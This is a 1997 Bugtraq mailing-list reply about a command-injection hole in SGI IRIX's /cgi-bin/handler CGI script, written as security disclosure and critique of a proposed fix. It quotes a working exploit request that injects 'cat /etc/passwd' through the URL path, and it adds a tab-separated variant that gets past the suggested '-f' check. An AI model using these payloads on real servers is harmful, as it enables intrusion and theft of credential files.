[4753] in bugtraq
Re: /cgi-bin/handler - more notes
daemon@ATHENA.MIT.EDU (der Mouse)
Fri Jun 20 21:28:07 1997
Date: Fri, 20 Jun 1997 15:37:02 -0400
Reply-To: der Mouse <mouse@RODENTS.MONTREAL.QC.CA>
From: der Mouse <mouse@RODENTS.MONTREAL.QC.CA>
To: BUGTRAQ@NETSPACE.ORG
> I have had reports that my exploit for SGI's /cgi-bin/handler does
> not work on IRIX 6.3 (on O2). I analyzed the code provided with IRIX
> 6.3 and they tried to fix it, but they actually DID NOT.
> telnet target.machine.com 80
> GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
> HTTP/1.0
> [...To fix this right...]
> All "open" commands should check if the their argument is really a
> filename. You could use:
> -f $doc && open (INPUT, $doc)
If you have untrusted local users who can install their own cgi-bin
stuff (I know of at least one large site that is in this situation),
this isn't enough. /cgi-bin/handler/whatever;cat\t/etc/passwd\|\t may
well exist, and open() will _still_ take it as a pipe.
> So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable.
> Anyone on IRIX 6.4? :) (What does it run on BTW?)
I know of one site with an Octane that runs 6.4. I'd try this, but
that site runs exactly one web server, and it ain't SGI's. I could
turn on the web server on the Octane, I suppose, but I'm hesitant to
mess with it....
der Mouse
mouse@rodents.montreal.qc.ca
7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B
